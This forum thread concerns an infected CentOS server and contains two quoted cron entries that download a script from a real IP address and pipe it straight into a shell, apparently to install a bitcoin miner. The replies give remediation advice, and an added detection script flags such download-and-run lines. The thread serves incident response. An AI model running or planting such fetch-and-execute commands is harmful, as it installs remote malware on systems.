
Infected Cron tasks

Posted: 2017/10/24 16:44:33
by jrguzman23
Problems with crontab tasks.

Good day.

I have a problem with a CentOS server where the cron tasks are restored and the following tasks are created:
* / 26 * * * * wget -O--q http://5.188.87.12/langs/logo.jpg|sh
* / 25 * * * * curl http://5.188.87.12/langs/logo.jpg|sh
I request your support, since I have not managed to disinfect the server.

Re: Infected Cron tasks

Posted: 2017/10/24 17:04:23
by TrevorH
If that is root's crontab then you need to back up your data, reinstall the system and then restore (carefully inspecting the restored data for any signs of compromise). You cannot recover from a root compromise safely. You can never be 100% sure that you have found all backdoors into the server.

The code there appears to be a bitcoin miner.

You should also attempt to locate how they got into your server in the first place. Make sure that your replacement install is fully up to date before you put it online.
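
Added example, not part of any post in this thread: a shell check for the pattern shown in the first post (a cron entry that downloads a URL and pipes it into a shell), usable on the live system or on restored data before it goes back onto a reinstalled server. The function names and the backup mount point are assumptions; a scan with no hits does not show that a system is clean.

```shell
#!/bin/sh
# Added example (not from the thread): list cron entries that download a URL
# and pipe it straight into a shell, the pattern shown in the first post.

# wget or curl, then a URL, then a pipe into sh/bash/dash/ksh/zsh.
FETCH_PIPE_RE='(wget|curl)[^|]*https?://[^|]*\|[[:space:]]*(ba|da|k|z)?sh([[:space:];&]|$)'

# scan_cron_text LABEL: read crontab text on stdin and print "LABEL: line"
# for every non-comment line that matches the pattern.
scan_cron_text() {
    grep -Ev '^[[:space:]]*#' | grep -Ei "$FETCH_PIPE_RE" |
        awk -v label="$1" '{ print label ": " $0 }'
}

# scan_cron_tree ROOT: scan the usual CentOS cron locations under ROOT.
# ROOT is "" for the running system, or the directory where a backup was
# restored (that directory is an assumption, e.g. /mnt/restore).
scan_cron_tree() {
    root=$1
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/* \
             "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/*; do
        [ -f "$f" ] && scan_cron_text "$f" < "$f"
    done
    return 0
}

# Usage: scan_cron_tree ""            (live system, run as root)
#        scan_cron_tree /mnt/restore  (restored backup)
```
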

Re: Infected Cron tasks

Posted: 2017/10/24 17:16:43
by avij
For the record, I've also sent a note about this to the abuse email addresses of the two affected ISPs so that they would shut down those servers.

Re: Infected Cron tasks

Posted: 2017/10/24 18:43:38
by jrguzman23
Thank you very much.